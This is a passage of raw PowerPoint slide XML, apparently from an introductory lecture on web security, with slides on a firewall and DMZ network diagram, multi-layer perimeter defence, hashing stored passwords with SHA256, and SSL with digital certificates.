            <a:off x="1331913" y="3284538"/>
            <a:ext cx="360362" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6084888" y="3132138"/>
            <a:ext cx="1008062" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8210" name="TextBox 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4140200" y="2638425"/>
            <a:ext cx="96202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GB"/>
              <a:t>TCP 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>443</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8211" name="TextBox 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7034213" y="2565400"/>
            <a:ext cx="706437"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GB"/>
              <a:t>TCP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>1443</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9236" name="Straight Arrow Connector 44"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5724525" y="3284538"/>
            <a:ext cx="360363" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9237" name="Straight Arrow Connector 45"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7164388" y="3284538"/>
            <a:ext cx="503237" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4859338" y="5148263"/>
            <a:ext cx="6858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a:t>DMZ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3779838" y="5075238"/>
            <a:ext cx="2808287" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="7030A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51" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="4932363"/>
            <a:ext cx="0" cy="142875"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="7030A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52" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="4932363"/>
            <a:ext cx="0" cy="142875"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>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53" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="2060575"/>
            <a:ext cx="0" cy="936625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="3716338"/>
            <a:ext cx="0" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="2060575"/>
            <a:ext cx="0" cy="936625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="3716338"/>
            <a:ext cx="0" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>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210"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8210"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="5" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8199"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="819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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>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8211"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>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checkerboard(across)">
                                      <p:cBhvr>
                                        <p:cTn id="4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8" grpId="0" animBg="1"/>
      <p:bldP spid="8210" grpId="0"/>
      <p:bldP spid="8211" grpId="0"/>
      <p:bldP spid="49" grpId="0"/>
      <p:bldP spid="50" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="52" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="0" animBg="1"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="0" animBg="1"/>
      <p:bldP spid="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74352" y="198214"/>
            <a:ext cx="7558088" cy="998538"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Multi-layer perimeter defence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="Content Placeholder 3" descr="ultrasecure2.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824275" y="1383531"/>
            <a:ext cx="7708165" cy="5213821"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6589713" y="6516688"/>
            <a:ext cx="25908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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: mcgladrey.com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974154" y="-99392"/>
            <a:ext cx="8134350" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Encryption and the storage of data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="1700808"/>
            <a:ext cx="4969073" cy="4392488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Use algorithm to encrypt data such as passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Example - SHA256 : a one-way encryption algorithm using hash function</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Example of use: compare user input with that in the database to authenticate passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Flowchart: Magnetic Disk 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="3573463"/>
            <a:ext cx="1728788" cy="2376487"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>Encrypt important stored data </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6710363" y="6453188"/>
            <a:ext cx="23256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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: Felke-Morris</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1127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2147888"/>
            <a:ext cx="2381250" cy="12096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a:xfrm>
            <a:off x="1033264" y="476672"/>
            <a:ext cx="6563072" cy="720179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Secure socket layer (SSL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12295" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1989138"/>
            <a:ext cx="4040188" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1989138"/>
            <a:ext cx="4041775" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Digital certificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="976064" y="1340768"/>
            <a:ext cx="7772400" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
